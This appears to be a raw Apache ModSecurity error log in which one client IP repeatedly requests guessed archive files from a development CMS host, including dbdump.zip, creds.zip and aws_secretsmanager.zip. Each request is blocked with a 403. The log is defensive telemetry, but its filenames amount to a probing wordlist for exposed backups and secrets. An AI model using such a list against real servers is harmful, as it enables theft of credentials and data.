[maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/application.zip"] [unique_id "aa2sJ2aTUOdovAC89_RArgAAApE"] [Sun Mar 08 19:04:39.782767 2026] [:error] [pid 12902:tid 12947] [client 35.189.151.148:39804] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/dbdump.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAqwAAAow"] [Sun Mar 08 19:04:39.782887 2026] [:error] [pid 11078:tid 11111] [client 35.189.151.148:43386] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/site.zip"] [unique_id "aa2sJ3-dmvIeGeY060kiogAAAcE"] [Sun Mar 08 19:04:39.782896 2026] [:error] [pid 12902:tid 12936] [client 35.189.151.148:40928] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/0.zip"] [unique_id "aa2sJ2aTUOdovAC89_RArAAAAoE"] [Sun Mar 08 19:04:39.783028 2026] [:error] [pid 12902:tid 12941] [client 35.189.151.148:42474] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wordpress-complete.zip"] [unique_id "aa2sJ2aTUOdovAC89_RArQAAAoY"] [Sun Mar 08 19:04:39.783035 2026] [:error] [pid 13605:tid 13627] [client 35.189.151.148:39484] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/configs.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfowAAANQ"] [Sun Mar 08 19:04:39.783129 2026] [:error] [pid 12902:tid 12951] [client 35.189.151.148:42902] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/staging.zip"] [unique_id "aa2sJ2aTUOdovAC89_RArwAAApA"] [Sun Mar 08 19:04:39.783790 2026] [:error] [pid 13471:tid 13495] [client 35.189.151.148:60960] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/patch.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4BgAAABQ"] [Sun Mar 08 19:04:39.787289 2026] [:error] [pid 13471:tid 13494] [client 35.189.151.148:44672] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_cloud_config.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4BwAAABM"] [Sun Mar 08 19:04:39.787289 2026] [:error] [pid 13605:tid 13615] [client 35.189.151.148:40024] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/12.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfpQAAAMg"] [Sun Mar 08 19:04:39.787303 2026] [:error] [pid 13605:tid 13610] [client 35.189.151.148:40478] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/last.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfpAAAAMM"] [Sun Mar 08 19:04:39.787306 2026] [:error] [pid 12902:tid 12948] [client 35.189.151.148:40042] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_secretsmanager.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAsAAAAo0"] [Sun Mar 08 19:04:39.787380 2026] [:error] [pid 13605:tid 13628] [client 35.189.151.148:40188] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/prod.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfpgAAANU"] [Sun Mar 08 19:04:39.787428 2026] [:error] [pid 13473:tid 13527] [client 35.189.151.148:39422] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/creds.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6HQAAAIc"] [Sun Mar 08 19:04:39.787442 2026] [:error] [pid 13473:tid 13549] [client 35.189.151.148:38638] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/experimental.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6HAAAAJQ"] [Sun Mar 08 19:04:39.787479 2026] [:error] [pid 11078:tid 11120] [client 35.189.151.148:44074] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/yml.zip"] [unique_id "aa2sJ3-dmvIeGeY060kiowAAAco"] [Sun Mar 08 19:04:39.787598 2026] [:error] [pid 13473:tid 13514] [client 35.189.151.148:39310] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/build.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6HwAAAIA"] [Sun Mar 08 19:04:39.787674 2026] [:error] [pid 13473:tid 13542] [client 35.189.151.148:40348] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/dev.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6HgAAAI8"] [Sun Mar 08 19:04:39.787797 2026] [:error] [pid 13471:tid 13494] [client 35.189.151.148:60258] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-cloudformation.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4CQAAABM"] [Sun Mar 08 19:04:39.787803 2026] [:error] [pid 13605:tid 13615] [client 35.189.151.148:37936] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-20240101.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfpwAAAMg"] [Sun Mar 08 19:04:39.787830 2026] [:error] [pid 13471:tid 13492] [client 35.189.151.148:38836] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-stack.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4CAAAABE"] [Sun Mar 08 19:04:39.787888 2026] [:error] [pid 13473:tid 13538] [client 35.189.151.148:39218] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/utilities.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6IAAAAI0"] [Sun Mar 08 19:04:39.787953 2026] [:error] [pid 13473:tid 13527] [client 35.189.151.148:41866] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_1.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6IQAAAIc"] [Sun Mar 08 19:04:39.787993 2026] [:error] [pid 13471:tid 13499] [client 35.189.151.148:43702] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/recovery.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4CgAAABg"] [Sun Mar 08 19:04:39.788172 2026] [:error] [pid 13471:tid 13483] [client 35.189.151.148:41664] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/post-update.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4CwAAAAg"] [Sun Mar 08 19:04:39.790450 2026] [:error] [pid 13471:tid 13489] [client 35.189.151.148:41292] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/orders.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4DAAAAA4"] [Sun Mar 08 19:04:39.790462 2026] [:error] [pid 12902:tid 12957] [client 35.189.151.148:42472] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/common.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAsQAAApY"] [Sun Mar 08 19:04:39.790477 2026] [:error] [pid 12902:tid 12938] [client 35.189.151.148:39882] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-snapshot.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAsgAAAoM"] [Sun Mar 08 19:04:39.790594 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:40688] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/site_archive.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4DQAAAAk"] [Sun Mar 08 19:04:39.790632 2026] [:error] [pid 13471:tid 13498] [client 35.189.151.148:37964] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/work.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4DgAAABc"] [Sun Mar 08 19:04:39.790760 2026] [:error] [pid 13471:tid 13478] [client 35.189.151.148:44520] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/release_package.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4DwAAAAM"] [Sun Mar 08 19:04:39.790777 2026] [:error] [pid 12902:tid 12939] [client 35.189.151.148:38480] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/rc.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAswAAAoQ"] [Sun Mar 08 19:04:39.790988 2026] [:error] [pid 13472:tid 13525] [client 35.189.151.148:43872] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/december.zip"] [unique_id "aa2sJ13UyizU6P-l0YL84wAAAFA"] [Sun Mar 08 19:04:39.791244 2026] [:error] [pid 13471:tid 13480] [client 35.189.151.148:39968] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/www.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4EAAAAAU"] [Sun Mar 08 19:04:39.791297 2026] [:error] [pid 13472:tid 13537] [client 35.189.151.148:41670] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/original.zip"] [unique_id "aa2sJ13UyizU6P-l0YL85AAAAFU"] [Sun Mar 08 19:04:39.791368 2026] [:error] [pid 13471:tid 13493] [client 35.189.151.148:38692] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/boot.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4EQAAABI"] [Sun Mar 08 19:04:39.791428 2026] [:error] [pid 13472:tid 13506] [client 35.189.151.148:42608] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/test-backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL85QAAAEQ"] [Sun Mar 08 19:04:39.791427 2026] [:error] [pid 13605:tid 13608] [client 35.189.151.148:40234] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_parameterstore.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfqAAAAME"] [Sun Mar 08 19:04:39.791443 2026] [:error] [pid 13472:tid 13516] [client 35.189.151.148:43734] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/project-backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL85gAAAEs"] [Sun Mar 08 19:04:39.791531 2026] [:error] [pid 7010:tid 7060] [client 35.189.151.148:44544] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/protected.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-cgAAAZc"] [Sun Mar 08 19:04:39.791612 2026] [:error] [pid 13471:tid 13487] [client 35.189.151.148:38620] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/news.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4EgAAAAw"] [Sun Mar 08 19:04:39.791707 2026] [:error] [pid 7010:tid 7045] [client 35.189.151.148:40690] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 